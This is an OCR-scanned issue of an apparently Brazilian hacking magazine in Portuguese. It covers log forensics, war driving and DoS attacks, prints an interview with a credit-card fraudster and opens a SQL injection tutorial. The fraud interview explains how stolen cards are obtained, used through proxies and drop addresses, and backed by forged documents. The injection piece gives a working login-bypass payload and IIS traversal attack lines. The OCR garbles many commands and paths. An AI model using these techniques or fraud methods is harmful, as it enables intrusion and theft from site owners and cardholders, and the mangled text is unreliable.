tepdump: listening on etho 


Onde procurar provas: procure por IPs suspeitos, e grave as 
horas e datas dos pacotes recebidos. 

Maiores informações sobre o tepdump: 

htip:Awww.first.org 


Recuperando arquivos excluídos 
É possível recuperar um arquivo excluído pelo comando rm 


no Linux, mas essa é uma técnica que envolve um grande 


Por serem precisos, os logs 
gerados pelo Apache são 
uma grande arma contra 
o invasor 


conhecimento do sistema por quem vai executá-la. Todos os 
arquivos nos sistemas Unix são armazenados em locais físicos 
do disco, denominados inodes. Lá se encontram todas as in- 
formações sobre um arquivo no sistema, como última altera- 
ção e execução. Outro ponto importante do inodes é que lá 
consta o tamanho do arquivo e uma lista de blocos de dados. 
Quando um arquivo é excluído no sistema o tamanho do ar- 
quivo e sua lista de bloco de dados são definidos para zero, 
mas os dados no inode não são excluídos. Portanto, para recu- 
perar um arquivo excluído, você precisará das informações con- 
tidas no inode para reconstruir a estrutura do arquivo. Para 
encontrar o inode de um arquivo, utilize o comando Is: 

frootBlacalhost /JAs -i fetelarquivo 

55485 /etc/aquivo 


55485 é o inode do arquivo. Para visualizar esse arquivo, 
você poderá utilizar um comando simples, como pico ou vi: 
pico fetc/arquivo 


Agora é possível você visualizar o arquivo pelo seu número inode, 
mesmo se ele foi excluído. Uma ferramenta para executar esse 
procedimento é o icaí, disponível no software TCT: 

http://www. porcupine.org/forensics/tet html 


Para executar o icat e visualizar um arquivo pelo inode, utili- 
ze o comando abaixo: 
froot2localhost /Jéicat /devihdal 55485 


Simplesmente você visualizará o arquivo /etc/arguivo, mes- 
mo se ele tiver sido excluído. 


Sistema Windows 

Muitos opinam e dizem que o sistema de logs do Windows é 
fraco, sobretudo na configuração-padrão. Como tudo no Windows 
é fácil de se executar, configuraremos o sistema para gerar e gravar 
logs, a fim de uma possível análise e detecção de intrusos. 


Ativando o sistema de segurança do Windows NT 


No Windows NT, clique no bolão Start — Programs — 


Administrative Tools - User Manager. 
Em User Manager, selecione Policies — Audit 


Ative os eventos apropriados para o seu sistema: 

= Logon and Logoff 

-— User and Group Management 

= Security Policy Changes 

— Restart, Shutdown, and System 

No Windows 2000, clique em Start - Settings - Control 
Panel — Administrative Tools — Local Security Policy 


Para acessar os logs gravados pelo sistema, veja na pasta: 
localização: IsystemrootIsystem32Iconfig 
pia 


Arquivos de logs contidos na pasta: 

AppEvente.Evt - Log das principais operações e eventos 
do sistema 

SecEvent.Evt - Log dos principais eventos de segurança 

SysEvent.Evt - Log das principais operações e eventos do 
sistema 


Logs do IIS 

Para ativar os logs no IIS, clique em Start — Programs — 
Windows NT 4.0 Option Pack — Microsoft Internet Information 
Server - Internet Service Manager. Após isso, clique com o 
botão direito no site que deseja ver o log. 

Ative a opção Enable Logging para ativar os logs como pa- 
drão. Para uma configuração completa, clique no botão 
Properties. 


Visualizando os logs - Para visualizar os logs gerados 
pelo IIS, veja o arquivo: 
localização: IW/INNTISystem32ILogFilesIW35VCT 


O nome do arquivo é baseado na data atual, no formato 
aammdd.log. 


Tabela ARP 

No Windows, como o tcpdump no Linux, cada máqui- 
na tem uma tabela ARP que é renovada a cada 30 se- 
gundos. Ela contém os endereços de IPs corresponden- 
tes aos últimos pacotes enviados à sua máquina. Utilize 
o comando: 

arp -a : 

Para visualizar os últimos pacotes enviados à sua máquina. 


Exemplo de um ataque tipo Unicode no IIS 
Abaixo, segue um exemplo de um log do ataque tipo unicode 
em um servidor Windows com IIS. Um exemplo do arquivo 
gerado é 020102.log, que se encontra na pasta: 
localização: IINNTISystem32LogFilesIW35VC1 


12:15:20 200.204. 129.288 GET /scripts/../..Awinntisystem32/ 
attrib.exe 502 

12:15:50 200.204. 129.288 GET (scripts/../../winntisystem32/ 
cmd.exe 502 

12:17:34 200.204. 129.288 GET /scripts/../. Awinntisystem32/ 
tfip.exe 502 


Esse tipo de ataque é de fácil detecção no arquivo de log. 
Veja a data e hora de execução dos arquivos pelo IP 
“200.204. 129.288”. Esse é O IP do invasor. 


Prova do crime 

Todos os passos acima devem ser seguidos à risca para en- 
contrar algum rastro de uma invasão, sendo que ela será a sua 
prova para incriminar o autor, pois não há discussão em cima 
de provas concretas, geradas pelos logs. Assim, tendo os logs 
que provam a invasão e alteração de arquivos, você já pode 
incriminar o invasor. 


Rastreando o provedor do invasor 

Você já tem tudo em mãos, prova do crime e IP, mas não 
sabe como proceder para incriminar o invasor. Ok, para facili- 
tar as coisas, você poderá descobrir o provedor do IP do inva- 
sor que tem em mãos. Se o IP for estático, as coisas serão mais 
fáceis. O comando abaixo poderá fornecer o host de um IP no 
Linux e no Windows. Abaixo um exemplo no Linux: 

lrootelocalhost 1J& nslookup ip 


Mas, antes, lembre-se: um endereço IP pode ser forjado, 
literalmente copiado, de forma que o rastreamento será muito 
mais difícil, pois não envolverá só a técnica de rastrear. Portan- 
to, o rastreamento não depende só de você. 

Ok, com o endereço do provedor, você terá duas alternativas: 
primeira — entrar em contato com o provedor, informando data, 
hora, tipo de ataque e enviando as provas do crime, claro, com 
o IP; segunda — entrar em contato com as autoridades locais de 
seu estado. Sim, literalmente, chame a polícia, informando-a 
sobre o seu caso e orientando-se sobre como você poderá pro- 
ceder. Se o invasor for pego, ele poderá responder a processos. 
Para maiores informações, consulte um advogado. 
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WAR DRIVING 


RASTREANDO 


ns: Reprodução 


João Marinho 
joaoBdigerati com.br 


Iguém aí ainda duvida que o futuro da informática 
A esteja no wireless? À parte as discussões “filosó- 
ficas” que pipocam em sites, revistas, listas de 
discussão, etc., uma coisa é certa: nada soa mais 
confortável do que se imaginar usando a Internet, mandando 
mensagens para amigos e conectando periféricos sem se preo- 
cupar muito onde enfiar cada cabo (com o perdão da pala- 
vra...). Tudo isso com boa qualidade de desempenho, é lógico. 
Entretanto, não somente os usuários “pessoais”, mas tam- 
bém as empresas já acordaram para as promessas do wireless. E 
faz tempo: é possível encontrar, em várias cidades brasileiras, 
diversas companhias que interligam os computadores de seus 
funcionários sem utilizar fios, por meio de uma conexão wireless. 
Entre estas conexões, a mais comum, de longe, é o 802.11b 
ou Wi-Fi (wireless fidelity), um padrão especificado pelo IEEE 
(Institute of Electrical and Electronics Engeneers), que estabele- 
ce uma série de normas para a constituição de WLANS (Wireless 
Local Area Network), como arquitetura, métodos de transmis- 
são, protocolos, etc. O 802.11b surgiu comercialmente em 1999 
e, desde então, tem sido adotado por inúmeras empresas. 


Crescimento (in)sustentável? 

O que muitos se dão conta, porém, é que o crescimento do 
Wi-Fi e do wireless, em geral, não é só um mar de rosas, pelo 
menos para quem precisa se preocupar com segurança. Os 
problemas de os dados serem interceptados por pessoas mal- 


War driving: 
é bom, pode 
ser feito a dois 
e se pratica no 
carro. Gostou? 


intencionadas (crackers) e virarem moeda de troca no mercado 
negro são grandes: na verdade, aumentam, pois, por existirem 
no ar, as redes wireless podem ser rastreadas com uma facili- 
dade até maior do que as tradicionais. O destaque vai para o 
Wi-Fi porque, além de ser um dos padrões mais populares, as 
ondas de rádio (sistema utilizado por ele) não são algo propri- 
amente desconhecido na esfera tecnológica. 

A constatação desta verdade já possibilitou, inclusive, o 
surgimento de uma nova modalidade “esportiva” no mundo 
hacker: o war driving, ação que consiste em pegar um veículo 
qualquer, pôr um notebook embaixo do braço e, munido de 
cartões wireless e antenas, rastrear as redes Wi-Fi vulneráveis. 
Peraí, você deve estar se perguntando: se há problema com 
roubo por parte dos crackers, para que os hackers precisam 
disso? Pelo óbvio, caro Jedi: você só passa para o lado negro se 
quiser. As descobertas podem ser usadas para conhecimento 
e também para ajudar outros desenvolvedores, certo? 


Preparando o bote 

Os requerimentos mínimos são os seguintes: um computa- 
dor de fácil transporte (lógico que aí não se encaixa aquele 
dinossauro que você tem em casa), 486 ou superior (não fa- 
lei?), dotado de um sedutor slot PCMCIA para conectar um 
cartãozinho wireless deste tipo. Se tiver uma porta serial para 
GPS, então, é um T. 

Se você não tiver um slot para PCMCIA, entretanto, não se 


desespere. Há alguns adaptadores que lêem o dito cujo através 
de barramento PCI ou ISA. Uma boa, principalmente para quem 
tem Linux, que trabalha com uma grande variedade de ISA. 

Para finalizar, uma-antena capaz de captar os sinais de rádio. 
Em alguns casos, é possível comprar o acessório ao mesmo 
tempo em que se adquire o cartão, mas, se não for o seu caso, 
pode-se optar por.construir a sua própria antena. A última 
moda é usar as latinhas de batatas Pringles: fáceis de encon- 
trar, baratas, saborosas, úteis e portáteis. Pra que mais? 

Para finalizar, baixe da Web alguns aplicativos capazes de 
"decifrar""os sinais, identificar as redes e/ou informar se elas 
são ou não protegidas. Existem vários que fazem este traba- 
lho, e alguns dos mais famosos você encontra no final desta 
matéria. Tudo entendido? Mãos à obra! 


Correndo pra galera ARE es 

Coma as batatinhas. Você precisará de energia física, e uma 
antena cheia de sal e condimentos não lhe será muito útil. Além 
disso, a parte da construção da antena é a mais complicada. Por 
isso, descolamos alguns sites interessantes para você utilizar como 
guias, os quais, novamente, você encontrará no final da matéria. 

Depois de construída, a antena de Pringles contará com um 
cabo, que você conectará ao cartão PCMCIA, o qual, por sua vez, 
terá lugar de honra no slot de seu notebook. A bordo de um 
veículo, de preferência um carro, que fornece maior comodidade, 
e com um dos softwares de rastreamento instalado no laptop, 


você poderá obter informações sobre as redes Wi-Fi de uma de- 
terminada região, construindo uma espécie de mapa que permi- 
tirá saber onde os ataques seriam mais eficientes. Evidentemen- 
te, recomenda-se a presença de um acompanhante. 

É verdade que você não encontrará 100% de redes vulnerá- 
veis: alguns bons administradores tratam de utilizar sistemas 
de segurança para proteger os dados, como a criptografia. 
Entretanto, de forma semelhante à das redes convencionais, 
muitos outros — talvez a maioria - não têm prestado atenção 
nestes “pequenos detalhes”, o que faz com que muitas redes 
com dados valiosíssimos, em termos financeiros inclusive (não 
nos esqueçamos de que as pessoas jurídicas são as maiores 
consumidoras do Wi-Fi), estejam aí, pelos ares, totalmente aces- 
síveis, para quem quiser. 


Conclusão 

O war driving, embora ainda pouco comum no Brasil, não é 
tão recente. Existem registros, por exemplo, que datam do ano 
2000 e já fazem referência à prática. Muitos artigos, inclusive, 
que explicam seu funcionamento já possuem mais de um ano de 
existência. A origem de tudo, entretanto, é bem mais antiga. 
Quase “jurássica”, por assim dizer. É o war dialing, uma prática 
relativamente comum entre hackers dos anos 80, que buscavam 
redes abertas por meio de um modem que discava vários núme- 
ros de telefone de um mesmo local, numa época em que wireless 
e banda larga ainda eram um sonho bem distante. O war driving, 
portanto, seria apenas uma forma mais moderna de fazer o que 
os hackers sempre fizeram: rastrear vulnerabilidades, uma prova 
de que boas idéias nunca envelhecem. 


ONDE ENCONTRAR 


Para saber mais sobre war driving e wireless security: 
www.commweb. com/article/NMG2001120350008 


Para pesquisar sobre war dialing e sua relação com o war driving: 
1r.sans.org/wireless/war.php (é preciso se registrar, mas você também 
pode usar a cache do Google) 


Para se manter informado e aderir à prática: 
www. wardriving.com 


Para construir sua antena de Pringles: 
www.arwain.net/evan/pringles. htm 
www.oreillynet.com/cs/weblog/view/wlg/448 
www. baleareswireless.net/modules.php?op=modload&name= 
Sections&file=index&reg=viewarticle&artid=6 


Softwares de rastreamento: 
NetStumbler (Windows): mwiw.netstumbler.org e no CD desta edição 
AirSnort (Linux): 2/15nort.shmoo.com e no CD desta edição 
Wellenreiter (Linux): wwiw.remote-exploit.org 
AP Scanner (Mac): homepage. mac. com/typexi/Personal1.html 
Mognet (aplicativo portátil baseado em Java): www.chocobospore.org 
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DENIAL OF SERVICE 


por Bruno Cesar 
brunoQdigerati com.br 


alvez um dos mais temidos e devastadores tipos de 

ataques hoje na Internet seja o DoS (Denial of Service), 

um ataque baseado na recusa de serviço. Uma má- 

quina com conexão muito alta envia um grande nú- 
mero de pacotes para a máquina-alvo, que não consegue inter- 
pretar a grande quantidade de pacotes recebidos, causando a 
recusa de serviço, derrubando, assim, a máquina-alvo. 

Outro tipo de negação de serviço que vem se difundindo na 
Internet, de uns tempos para cá, é o DDosS (Distributed Denial 
of Service). Este tipo de ataque é baseado no Dos, só que com 
um impacto maior, pois usa máquinas zumbis para efetuar o 
ataque de negação de serviço - uma máquina comandará uma 
grande quantidade de máquinas zumbis que enviarão um gran- 
de número de pacotes a uma máquina-alvo. Assim, o hacker 
que comandar as máquinas zumbis deverá ter controle total 
sobre elas. 


Máquina de 
ATAQUE 


Máquina 
ALVO 


Ao lado segue uma 
figura da estrutura 
de um ataque DoS 
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Repercussão 

A identificação de um ataque tipo DoS é mais difícil do que 
podemos pensar, pois este ataque, na maioria das vezes, é 
executado a partir de uma máquina zumbi invadida e manipu- 
lada pelo verdadeiro culpado. Assim, para chegar ao autor e 
culpado do ataque será um longo caminho. Imagine um site 
como o da CNN ficando fora do ar por um ou dois dias. Sim, 
isso já aconteceu e a causa foi um ataque DosS. Para você, um 
site como o da CNN ficar fora do ar por um dia pode não 
significar nada, afinal, o que é um dia? Mas para eles um dia 
significa milhares de anúncios e visitas perdidas, gerando uma 
grande repercussão negativa. Isso tem um alto valor, pois um 
site como o da CNN pode ter mais de 100 mil visitas por dia. 


DRDoS E 

Depois do Dos e do DDos, o que seria o DRDoS? Uma vari- 
ação dos dois ataques? Sim, pode ser, mas com um impacto 
cem vezes maior. A nova geração de ataques DDos concentra- 
se no spoof da máquina-alvo e no envio de pacotes para a 
máquina-zumbi, mas com um porém: a máquina zumbi não 
precisa estar sob a posse de quem está fazendo o ataque. 
Simplificando o ataque, pense da seguintê maneira: quando 
uma máquina envia um pacote para outra, ela espera uma 
resposta da máquina que recebeu o pacote para ter certeza de 
que o pacote chegou à máquina requisitada, sendo que se a 
máquina que recebeu o pacote não responder, aquela que 
enviou reenviará outro pacote. No caso, o usuário que atacará 
a máquina-alvo usará uma técnica denominada spoof, que 
consiste em usar o endereço de outra máquina para que a 
requisição seja feita. Acompanhe a imagem abaixo para maio- 
res esclarecimentos. 


Máquina 


A 


Máquina 


Pacote SYN 
com endereço de € 


Responde pacote 
SYN/ACK 


Máquina 


Cc 


Reenvia o pacote 
pois € não responde 


A: Máquina do hacker 
B: Máquina zumbi 
C: Máguina-alvo 


Autor: Peter Robinson 


*Ubinlbash 


HRefuse responding to broadcasts request 
echo 1 > /proc/sys/net/ipvá/icmp echo. 
ignore broadcasts 

Source Routing Protection 

for fin fprocsys/netipva/cont/*/accept source 
“route; do 

echo O > $f 

done 

HTCP SYN Cookie Protection 

echo 1 >/procsysinetipvattcp syncookies 
*Disable ICMP Redirect Acceptance 

for fin fproc/sys/net/ipv4/cont/*/accept. 
redirects; do 

echo O > $f 

done 

HEnable always-defragging Protection 

echo 1 >/proc'sysnetiipvsip always defrag 
*Enable bad error message Protection 

echo 1 >/procsysinetipva/licmp ignore bogus 
error responses 

áLog Spoofed, Source Routed and Redirect 
Packets 

for fin fproc'sys/net/ipva/cont/*llog martians; 
do 

echo 1 > 3f 

done 


* there are more see www.linuxdocs.org 
&To protect from Synfloods etc Use, Note these 


figures can be adjusted to suite 


echo 30 >/proc'sys/netipvitcp fin timeout 
echo 1800 >/proc'sys/net/ipvá/tcp keepalive 
“time 

echo O >/proc'sysnetipvítcp window scaling 
echo 0 >/procsysinevipva/ltcp sack 

echo O >/procsys/net/ipvi/ftap timestamps 


exit 


A máquina A envia um pacote (SYN) “spoofado” para a 
máquina B, com o endereço da máquina C. A máquina B 
responde o pacote (SYN/ACK) para a máquina C, avisando o 
recebimento. A máquina C ignora o pacote, pois não foi ela 
que requisitou e enviou. A máquina B aguarda a resposta da 
máquina C. A máquina B reenvia o pacote, pois não obteve 
resposta de recebiménto pela máquina C. Isso ocorre sucessi- 
vamente, já que a máquina C nunca responderá o pacote, pois 
não foi ela que requisitou. 

O perigo 

Este tipo de ataque se torna mais perigoso, pois a partir do 
momento em que o hacker efetua o ataque, ele não precisa ter 
total controle da máquina zumbi — o único trabalho que ele 
terá será spoofar o endereço da máquina-alvo. Tendo um 
rastreamento praticamente impossivel e um ataque devasta- 
dor, o hacker poderá usar quantos servidores e fazer o número 
de ataques que quiser, que, com certeza, será sempre bem- 
sucedido. 


Solução 

A solução é bloquear pacotes do tipo SYN/ACK nas portas 1 
até 1023, bloqueando, assim, os pacotes do tipo refletido. Na 
verdade, essa é uma opção arriscada, pois bloqueando algumas 
portas, os visitantes do site poderão ter problemas para acessá- 
lo e podem ser bloqueados também. Isso é tudo que o hacker 


quer, que seu sistema fique inviável. Além disso, essa não é uma 
solução definitiva, pois outras portas poderão ser atacadas no 
servidor, como é o caso da porta “8080”, que não poderá ser 
bloqueada, pois é a porta HTTP usada para fazer a conexão do 
site ao usuário que poderá entrar no site. Se esta porta estiver 
fora do ar ou bloqueada, o servidor não poderá fazer a requisi- 
ção HTTP para que o visitante entre no website. 


Prevenção 

O melhor remédio é a prevenção. No caso, para evitar que 
sua máquina seja usada como zumbi, a opção mais viável é ter 
um firewall bem configurado, tanto para proteger o site con- 
tra um ataque quanto para não servir de zumbi. Assim, o 
firewall deve ser configurado pelo administrador, bloquean- 
do endereços que enviam muitas requisições ao servidor. Usar 
códigos para implementar o seu firewall é uma boa opção. 
Para ver um exemplo disso, veja o script no box da página 
anterior, que pode ser implementado em firewalls no Linux. 


Conclusão 

Hoje, todo e qualquer tipo de empresa ou site está exposto 
aos mais variados ataques. No futuro, novas tecnologias surgi- 
rão e, com isso, novos bugs e novas técnicas. Mantenha-se sem- 
pre informado. Inscrever-se em uma lista de discussão, como a 
Bugtrag, é uma boa opção. Lá são sempre postadas novas 


vulnerabilidades e novos tipos de ataque. 


VÍTIMA 


Ao lado segue uma 
figura da estrutura 
de um ataque DDos 
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CARDER 


Entrevistamos um dos subgrupos 
da Internet mais temidos pelos 
executivos do e-commerce: os 
carders. Esconda seu cartão de 
crédito antes de começar a ler. 


: 


O que motivou você a entrar e permanecer neste meio? 
Amigos, interesse pessoal e, claro, *ter as coisas sem ter que 
Nick: cshrc 


pagar com meu dinheiro*. 


Grupo: CarderBR (subfounder) 
Idade: entre 17 e 24 Um carder necessariamente tem que ser um hacker/cracker para 
Naturalidade: MG conseguir os cartões? 


OS que usa: Windows XP/Conectiva 7.0/FreeBSD 


Sim. No caso, tem que ser cracker para quebrar senhas de site, 
e hacker para achar a falha e adquirir os cartões. 


/sso coloca você no hall dos hackers, ou alguém faz esse traba- 
lho pra você? 

Não, tem membros que fazem isso que até são de outros paí- 
ses como um cara da Hungria. É ele quem faz isso para mim. 


Quais são as suas formas de seleção dos cartões? Ou seja, 
como você sabe qual dos cartões irá usar? Existe alguma espé- 
cie de “teoria da seleção”, em que você saiba “esse aqui sim, 
esse aqui não”? 

Não, como todos dizem: “o que vier, que seja bem-vindo”. 


Qual a operadora mais vulnerável? Ou seja, a operadora com 
maior incidência de roubos ou a preferida dos carders? 
Olha, não tem preferência, a operadora mais vulnerável no 
momento, sem dúvida, é a American Express (os amex), por ser 
mais aceito no mercado e um prazo maior de validade. 


Um carder não seria facilmente identificado? Ou seja, você faz 
uma compra e manda entregar num lugar. Não basta ficar 
vigiando esse lugar na hora da entrega? Ou o tempo é curto | 
| demais que não dá pra perceber até a entrega se o cartão toi | 
roubado? 


Geralmente o tempo é bem longo, dá pra comprar, receber e 
continuar na boa. O problema é que agora, quando você com- 
pra numa *empresa*, ela liga pra você, dono do cartão, antes, 
para confirmar o seu débito. Em algumas *empresas* isso 

| não é feito, mas ultimamente esse método está sendo bem 
utilizado. No caso do prazo, depende da *empresa*: se ela 
confirmar via banco ou operadora, *Ótimo*, seu pedido será 
enviado sem problema; se ela não fizer isso e preferir ligar 
antes, *azar o seu*. 


a 
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Quais são as formas que um carder pode usar para conseguir 
os cartões? 

Bom, as mais utilizadas são: descobrindo o bug de um site de 
compras onde ficam depositados os cartões nos arquivos de 
extensão .db, pegando em redes gringas como dalnet.com ou 
até mesmo roubando (aí é outro assunto). 

Qual foi o maior golpe, de uma só vez, que você fez? E como 
foi feito? Cite números e valores. = 

Essa parte é boa. O maior golpe foi a compra de três laptops 
de uma vez nã Semp Toshiba, que foi feita normalmente, 
num sábado à noite. Abri meu Opera (navegador), pus meu 
proxy e fui às compras. Bom, o total foi 14.000 dólares, e a 
compra foi aceita, parcelada no cartão em 6 vezes. Mas o 
dono do cartão cancelou e meu pedido não veio (essa parte 
é a pior: cancelamento de compra). Mas isso foi há muito 
tempo, no início. Agora, nós compramos muitos livros, 
softwares, domínios, peças para PC, notebooks, etc. 

Uma das minhas compras bem-sucedidas foi de um CD-ROM 
e um monitor de 17, tela plana, com valor estimado em 2 mil 
dólares, mas não fiquei com nada, vendi. :) 

No caso da Semp Toshiba, que foi cancelada um dia depois, o 
endereço de entrega era da lanbox (lanbox é um P.O.box dos 
EUA que é redirecionado ao seu endereço verdadeiro), e a 
entrega do CD e do monitor foi na casa de um amigo... 


Qua! foi o maior golpe que você presenciou de carding? E 
como foi feito? 

Olha, vou falar do maior golpe do meu clã, CarderBR. Nós 
fazemos arrastões algumas vezes, juntamos todos e vamos às 
compras. Nosso último prejuízo foi de US$ 6,736.54, mas já 
teve maiores, só não lembro o valor. 

Foi feito em várias lojas, entre elas sites de webhost shells, 
sites de roupas, drivers, coisas pra PC, etc. A maioria é bem- 
sucedida. Num desses casos, um membro nosso foi preso por 
usar CC Br e mandar entregar em casa. 


A princípio, essa idéia de mandar entregar em casa seria meio 
infantil. já que é fácil ser descoberto. Conte mais a respeito 
do caso. 

Têm vários pontos de vista. É só não exagerar e ter uma des- 
culpa bem apurada. Tivemos um ex-membro (nikom13) que 
foi pego porque mandou entregar muitas coisas em pouco 
tempo. Mandou entregar na casa de um amigo dele (maior 
de idade), e a polícia foi lá e deu um flagrante. Ele teve que 
confessar, pois o amigo era maior, de idade e ele não queria 
prejudicar o “amiguinho”. No mais, é só usar um proxy que 
é o mínimo para se “proteger”. No final só rola uns BOs aqui 


e ali, e tudo acaba bem. 


Os sites brasileiros são mais vulneráveis do que os sites estran- 
geiros? Tanto em conseguir usar um cartão quanto em conse- 
guir os dados de cartões usados? 

Olha, nos dois casos citados aí, os estrangeiros são melhores 
tanto em dados de cartões quanto em menor vulnerabilidade 
de sites. 


Quando compramos algo pela Internet usando cartões de cré- 
dito, as informações do cartão ficam expostas? Há um mito 
rondando a Internet que não é seguro comprar, pois um hacker 
pode interceptar as informações. Até que ponto isso é real? 
Isso é até novidade pra mim, mas vamos lá. Claro, nada é 
100% seguro, já virou ditado. Sempre suas informações fica- 
rão expostas numa compra ou coisas do gênero. Agora, so- 
bre a parte de hacker interceptar as informações, depende. 
Se ele estiver dentro da máquina (empresa) no mesmo mo- 
mento em que você estiver efetuando a compra, obviamente 
ele terá acesso a tudo. 


Um carder age somente na Internet ou um garçom que clona 
um cartão também pode ser considerado um carder? 

Nós atuamos principalmente na área virtual, mas de vez em 
quando precisamos falsificar uns documentos (faturas, RGs, 
etc.) para não desconfiarem. Algumas vezes nós damos uma 
escapadinha e clonamos uns cartões. 


Os cartões internacionais são melhores ou piores do que os 
nacionais? 
Os internacionais são bem melhores, até porque costumam 


EE 
ter mais créditos do que os brasileiros, espanhóis, italianos... 


Os melhores são os americanos, japoneses e russos, por terem 
muito mais crédito do que os outros. 


Você tem um cartão de crédito seu? Se sim, não tem medo 
de ser roubado por outro carder? Se não, um dia preten- 
de ter um? 

Olha, eu não tenho cartão não. Se um dia eu viera ter, não vou 
me importar não, até porque eu posso Selecionar a operadora 
do cartão pra me informar sobre todos os pedidos de compras 
e afins. :] Mas como sempre se diz: nada é 100% seguro. 


Como você procederia se soubesse que um cartão de crédito 
de um amigo seu foi usado por este método? Teria alguma 
forma de ajudá-lo a se explicar na operadora, dizendo que 
não foi ele? ! 

Sim, mas, neste caso, você tem que ter provas pra conven- 
cer a operadora de que você ou a pessoa não fez aquele 
ato. Caso não tenha essas provas, o amigo, infelizmente, 
*danou-se*. 


E) 
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As provas mais prováveis a serem usadas, neste caso, são 
os logs da empresa onde foi feita a compra, horário e IP 
*caso não esteja usando um proxy*. Aí a operadora irá 
conferir hora, logs e IP e achará a verdade. Hoje o mundo 
da informática é bem avançado, provas sempre existirão, o 
problema será achá-las. 


Você nunca pensou em escrever um livro ou fazer um site para 
passar alguns dos seus conhecimentos de carding para quem 
quer saber deste meio? 


Sobre a questão do livro eu nunca pensei não, acho que não 
se ensina essas coisas, né? Passar conhecimentos é simples, 
qualquer um pode fazer, é só querer... 


O que você acha que deveria ser feito pelas operadoras de 
cartões para tentar travar isso? 

Se eu for pensar no meu caso pessoal, quero que eles deixem 
as coisas como estão, claro hehehe. 

Mas como eu sou brasileiro nato, não quero prejudicar meu 
país, muito menos meu povo. As operadoras podiam fazer o 
seguinte: no cartão você tem o número, nome de usuário, 
data de validade e agora contém o cvv2 (código de segurança). 
Ela podia solicitar um número extra no cartão, ou seja, no 
cartão normal, um número inválido que não serve pra absolu- 
tamente nada. 

Ele simplesmente ficaria no lugar do número válido. Você pega 
o cartão, olha, vê o número, copia e, quando vai ver, não serve 
pra nada. 

O número verdadeiro seria um chip codificado implantado no 
cartão, cuja clonagem é impossível. Claro que isso é coisa de 
primeiro mundo, e as operadoras não fazem porque não que- 
rem ou temem por grandes perigos no futuro. Lógico que é 
algo a ser adotado mais pra frente. Quando a coisa estourar 
mesmo, eles terão que tomar uma atitude dessas. 


O Brasil está rumando para uma nova gestão financeira, em 
que os chegues ficarão quase extintos e tudo será feito com 
smart cards, ou seja, os cartões com chips que gravam infor- 
mações de créditos, entre outras coisas. Você acha que isso 
causará algum problema às operadoras que o implantarem? 
Facilitará ou dificultará a ação dos clones? 

Não dificultará em nada a clonagem. Hoje você pode fazer isso 
até pelo computador. Eu vi uma matéria sobre os smart cards 
num canal gringo, mostrando que computadores e progra- 
mas estão sendo fabricados especialmente pra isso. Vai ser a 
mesma coisa que clonar um vale-transporte: é só passar no 
scan, imprimir, morreu. :) 


Você conhece mais alguma boa história sobre carders que fi- 
zeram compras com cartões roubados? 

Um maluco da Microsoft conseguiu pegar o cartão do senhor 
Bill Gates e não desfrutou da maravilha que ele conseguiu... :) 


Um comentário final para nossos leitores... 

Olha, primeiro vou mandar um abraço pra galera do CarderBR 
e amigos, e pros leitores eu deixo aquele abraço também e 
dou uma dica: entre nessa com a cabeça boa pra não se arre- 
pender depois. 
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ASP e 


SQE SERVER | 


UMA DUPLA EXPLOSIVA 


epois do enorme sucesso do falhas em Logins, na 
H4ck3r &4, com todos os exemplares da esquina 
vendidos, resolvi escrever o segundo capítulo da 
novela “/h, ferraram meu site”. 

Agora que você já sabe como entrar em um site restrito, que 
peça login e senha, feito em ASP com SQL, vamos aprender 
como ver dados das tabelas, modificar ou até mesmo apagar 
todo o banco de dados. 

Aqui serão usados conhecimentos avançados de programa- 
ção em SQL. No entanto, se você não conhece SQL, esta maté- 
ria não adiantará muita coisa. Recomendo que, caso queira se 
tornar um perito em invasão de banco de dados, aprenda SQL 
primeiro. ;) 

Nem só de campos de formulários vive um site. Ele também 
pode passar informações pela linha de endereços. Se você não 
consegue fazer alguma coisa pelos próprios campos (aqui tam- 
bém usaremos o campo de usuário de um login para fazer as 
ações), abra o código-fonte da página (aquele com o clique do 
botão direito do mouse, exibir código-fonte) e procure pela 
linha do <form Action>. O que vem depois do action é a URL 
ou página a ser chamada pelo formulário. Depois, procure nos 
<input>s da vida o campo de entrada do usuário, geralmente 
denominado name=usuário ou name=user. Feito isso, já te- 
mos a nossa ação pela linha de comando, livre das travas im- 


postas pelo formulário, tais como o limite de caracteres ou 
alguma validação de campo feita em JavaScript. Dessa forma, 
em vez de preencher o campo usuário, no form, você colocaria 
no endereço uma URL desse tipo: 

www.siteemasp. tld/arquivo. asp ?user=comandos em sql. 

Não se preocupe com os espaços na URL, pois o Internet 
Explorer é bonzinho e se encarrega de trocar pelos devidos 
códigos de espaço (%20). 


Um pouco da teoria 

No SQL, o comando de banco de dados é simplesmente uma 
string com um texto dentro. Este texto, formado de comandos 
pré-estipulados, é interpretado pelo SQL e retorna o que foi 
pedido. Além dos comandos, existe também uma definição de 
comentário dentro do SQL que, pra muita gente, é algo desco- 
nhecido. Da mesma forma que você pode comentar o seu script 
ou programa, incluindo linhas que dizem para que serve cada 
bloco, o SQL também permite, dentro dessa string, um comen- 
tário que facilitará o entendimento da string quando for lida 
por outra pessoa. Apesar de quase nunca ser usado na prática, 
esse caractere de comentário terá uma função extremamente 
valiosa para nós. Outro caractere que será muito usado e vene- 
rado aqui é o caractere de “faz mais alguma 
coisa”, que além de executar o primeiro comando, manda exe- 


cutar um segun- 
do comando, dentro 
daquele primeiro. Vocês en- 
tenderão o que eu estou dizendo 
mais adiante. 


Só pra ilustrar, o caractere de comentário é 
composto de dois sinais de menos (--) e o caractere de nova 
execução é o ponto-e-vírgula (;). O caractere asterisco (*) signi- 
fica todos os campos da tabela. 


Finalmente, vamos à prática... 

Seria interessante se, ao mesmo tempo em que for lendo, você 
fosse também testando em algum site o que será dito adiante. É 
mais prudente montar um site em ASP, com um acesso ao banco 
de dados em SQL Server próprio, para Lestar. É sempre válido 


Chora, 


lembrar que esta matéria é ape- 
nas para fins educacionais. 
Você está num site em ASP, com 

acesso por SQL, que usa um cam- 

po de login e senha vistos por uma 

SQL deste tipo: 

SQL = "Select * from usuarios where 

username="" & user & "" and pass="" & pass 

guru 


A SQL é deste tipo, mas você, como usuá- 
rio normal do site, não conseguiria saber isso. 


No campo de usuário, se você colocar o conteúdo: 
Usuário: admin” -- 
Senha: xyz 


O que acontecerá é que você entrará no site como se fos- 
se o admin (levando em consideração que admin é o usuá- 
rio real, cadastrado no banco de dados como sendo o 
admin), mesmo sem saber a senha do admin, pois a senha 
agora será ignorada. 


O caractere — no final do campo especifica ao SQL que, 
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daquele ponto em diante, tudo é comentário, e a string do 
SQL final ficaria deste tipo: 
SQL = "Select * from usuarios where username='admin' -- 


and senha='xyz 


Ou seja, a verificação ” * and senha=...” virou um simples 
